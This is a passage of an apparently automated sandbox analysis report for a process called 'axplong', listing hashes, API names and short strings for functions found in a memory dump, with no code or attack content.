                      • Opcode Fuzzy Hash: 1f12f649fce8a1fa8dffa148c32a30db4616a6410ecf59ea8bc6ddb293338267
                      • Instruction Fuzzy Hash: 59517AB2A006058FDB25CF54D8857AEBBF0FB88311F24C66AD406EBA91D7789D50CF54
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c8ec932b6ebef8258c29052b01c2375f3050553eade59fbd226a938a62169f1d
                      • Instruction ID: 900c3310828d581b6b429a2839fd5d81c6a5c24a5d73d4083e47bc7b92229420
                      • Opcode Fuzzy Hash: c8ec932b6ebef8258c29052b01c2375f3050553eade59fbd226a938a62169f1d
                      • Instruction Fuzzy Hash: 8651D6716093D18FC319CF2D9515636BBE1BFCA200F084A9EE0DA87282D738D644CB92
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a5b1fb2c0d40ddf62553d3b0a148364afcacc2dc9d6affe81e0e7d12d7551d40
                      • Instruction ID: 8a25ebe8de4b18d86309fa77320727191f7ffa30bc65dd6b8dd69f805c7b9911
                      • Opcode Fuzzy Hash: a5b1fb2c0d40ddf62553d3b0a148364afcacc2dc9d6affe81e0e7d12d7551d40
                      • Instruction Fuzzy Hash: A221B673F204394B770CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D96CD917E2E4
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc34073d0a7c9e8b0cb82df18743a79aa6ecaba82719e7ab1f9d8a52465410f8
                      • Instruction ID: f8e8050e92496965ff2d404398e874a14cc6d597ddc0b5d2317cd022581512a8
                      • Opcode Fuzzy Hash: bc34073d0a7c9e8b0cb82df18743a79aa6ecaba82719e7ab1f9d8a52465410f8
                      • Instruction Fuzzy Hash: 9F118A23F30C255B675C817D8C1727AA5D2EBD825071F533AD826E7384F9A4DE23D290
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 45fe932c4440ff9da24f73b4167aac42ae4a764a40bf4fff68e631ea100cd58f
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 93115B7B20014143D6C486BDC8F45B7A7B6EBD5331B3D437BC0814B758DE2AE944D902
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0e1748daed78890de0225781a804db89e6a9385cb128909560a936ad5d36a48
                      • Instruction ID: c71023c15bb6bc017b24bd81c66dd64621db1c77713cfce9373acbfbf7811418
                      • Opcode Fuzzy Hash: c0e1748daed78890de0225781a804db89e6a9385cb128909560a936ad5d36a48
                      • Instruction Fuzzy Hash: E3E08C3014168CBBCF297F14C848E483B6AEB41799F00841CF8048A621CB7DEFA2CA80
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: 4c71f0ec3b760028eb6d788accf573f395a2b8050a423e0adc3c36812a5d4c72
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 02E0463291122CFBCB15DB888908E8AF3BCEB48B05F19409EB501D3240C274DF00C7D1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: e4319fb7e9396dab1c1a278b94e4c64eb2cff86d7cedba8abcf502081cdd52bc
                      • Instruction ID: 14b02944386fcb5c7fa49884250fce1363a0af6aa8c2b4237b63f170756c1075
                      • Opcode Fuzzy Hash: e4319fb7e9396dab1c1a278b94e4c64eb2cff86d7cedba8abcf502081cdd52bc
                      • Instruction Fuzzy Hash: B101A52760866A66565C645D9C07F3B179C9BC6BB471D002FF944E72C2DE5CEC428590
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 4683adfabb82a2d5cba245e385537e692c2e832277e1db857438c6cc1223b52f
                      • Instruction ID: 8e24b2df8011f05b455e08cc662bb9ad6c2e4a718336a72ddef6b2eb1bead7d9
                      • Opcode Fuzzy Hash: 4683adfabb82a2d5cba245e385537e692c2e832277e1db857438c6cc1223b52f
                      • Instruction Fuzzy Hash: 45A104B0A01709EFDF11DF68D84976AB7B9FF56314F008269E815D7252EB38EA04CB91
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792806
                      • ___std_exception_destroy.LIBVCRUNTIME ref: 007928A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy___std_exception_destroy
                      • String ID: P#y$P#y
                      • API String ID: 2970364248-534735823
                      • Opcode ID: 644f4482ef3d92b9e2d9318a9c7a8979090eb22987862d0019645e5f3f65c767
                      • Instruction ID: 0507d6469465ab9978bd041f9003a01653b8398bd89eca09a549eccce4b2f263
                      • Opcode Fuzzy Hash: 644f4482ef3d92b9e2d9318a9c7a8979090eb22987862d0019645e5f3f65c767
                      • Instruction Fuzzy Hash: A3717071E00248DBDF04DF98D885BDDBBB5EF59310F14422DE805A7242E778A984CBA5
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 007A795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 007A7968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 007A7971
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: @yz
                      • API String ID: 4078500453-3254128207
                      • Opcode ID: ca137afc573bef1faa4a285e6c99193065647bab7e98abafa9d4ebfa74b63c86
                      • Instruction ID: 39a6b0bd7e3ccf3da1c45360f90a0854093fa76a65defc2bcb1c18f21fceab4a
                      • Opcode Fuzzy Hash: ca137afc573bef1faa4a285e6c99193065647bab7e98abafa9d4ebfa74b63c86
                      • Instruction Fuzzy Hash: A931F3B29043049BD724DF64D845A6BB7E8EF96310F10072EF546C3602E779FA54C7A1
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y$This function cannot be called on a default constructed task
                      • API String ID: 2659868963-1304002132
                      • Opcode ID: ae4d9ebc70a98d9418ffd30948cdfd77edefe03b2cbc535d2cae4ef544fda597
                      • Instruction ID: 7e53cf73f6b12b72b923e00cff957e491a7add1286550c3a09ae666ac4435af1
                      • Opcode Fuzzy Hash: ae4d9ebc70a98d9418ffd30948cdfd77edefe03b2cbc535d2cae4ef544fda597
                      • Instruction Fuzzy Hash: 8AF02B71A1030CABCB10EF6DE841D9EB7EDDF09300F5082ADF80897201EB78AA54CB95
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: d14af661019cc91e1f021416d10a5f63aaa7be26c6c167c71b63dbff288ab80f
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 87B114729002859FDB22CF68C895FAEBBA5EF55340F1481AEE84D9B341D63C9D41CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 90fdcb8046db45b7fcbc767288d249d85deafe8000e22ba77f8a7bb5583d54ef
                      • Instruction ID: f114ae5d7fb4e72df4e13b703caa0e08bb348f469c9a7689d61c207a3a942999
                      • Opcode Fuzzy Hash: 90fdcb8046db45b7fcbc767288d249d85deafe8000e22ba77f8a7bb5583d54ef
                      • Instruction Fuzzy Hash: 82216271E01109EFDF11EFA4CC859BEBBB8EF89710F104165F601A7251DB78AD419BA1
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 007A726C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.y$`zz
                      • API String ID: 3366076730-310687464
                      • Opcode ID: bc136e843efb4be327eca9bc21c562a29d75622643b3ac9a66eeedf95846a6b8
                      • Instruction ID: d130fb60edd15d75238d5663a0282d44592f8eb0ecd3832a81baac27eeb53b6b
                      • Opcode Fuzzy Hash: bc136e843efb4be327eca9bc21c562a29d75622643b3ac9a66eeedf95846a6b8
                      • Instruction Fuzzy Hash: F9A127B0A01619CFDB25CFA8C88479EBBF0BF89710F158259E819AB351E7799D01CF90
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 00793962
                      • __Mtx_init_in_situ.LIBCPMT ref: 007939A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pBy
                      • API String ID: 3366076730-1076254045
                      • Opcode ID: 9038bb56f7db7642c78ac8ca0292863eb4a7833688dd109794002f70c29fa550
                      • Instruction ID: bcb062404f438c63d0db7793a082e1a7e4a992e6406544eb53d52a90d7afceff
                      • Opcode Fuzzy Hash: 9038bb56f7db7642c78ac8ca0292863eb4a7833688dd109794002f70c29fa550
                      • Instruction Fuzzy Hash: 594115B0501B059FDB20CF19C588B5ABBF4FF84315F148619E96A8B341E7B9EA15CF80
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0079247E
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y
                      • API String ID: 2659868963-534735823
                      • Opcode ID: 19ebc9a4d80d1a0ad21a8ae899238908c91a21c3f19e5eb1b1a78a459c2560c6
                      • Instruction ID: 95ef998c5db4fbaf80586e2cda9fc13584f3a956a2969aa737502b16dcc0441f
                      • Opcode Fuzzy Hash: 19ebc9a4d80d1a0ad21a8ae899238908c91a21c3f19e5eb1b1a78a459c2560c6
                      • Instruction Fuzzy Hash: EAF0E5B191024CA7C714FBE8D805D89B3ACDE15300B008A39F754E7601FBB8FA5487D1
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00792552
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#y$P#y
                      • API String ID: 2659868963-534735823
                      • Opcode ID: fb1a8b563a2af2d6a1e7423f53c30c018666e72562fff32c06d9da5882a9bd46
                      • Instruction ID: 1366827cc1e1db46879d58286cd9d5d3c960297e923dda537ec3b83734e79b20
                      • Opcode Fuzzy Hash: fb1a8b563a2af2d6a1e7423f53c30c018666e72562fff32c06d9da5882a9bd46
                      • Instruction Fuzzy Hash: 92F0A771E1120DEFCB14DFA8D841A9EBBF4AF59300F10C2AEE44467200EB745A95CBD9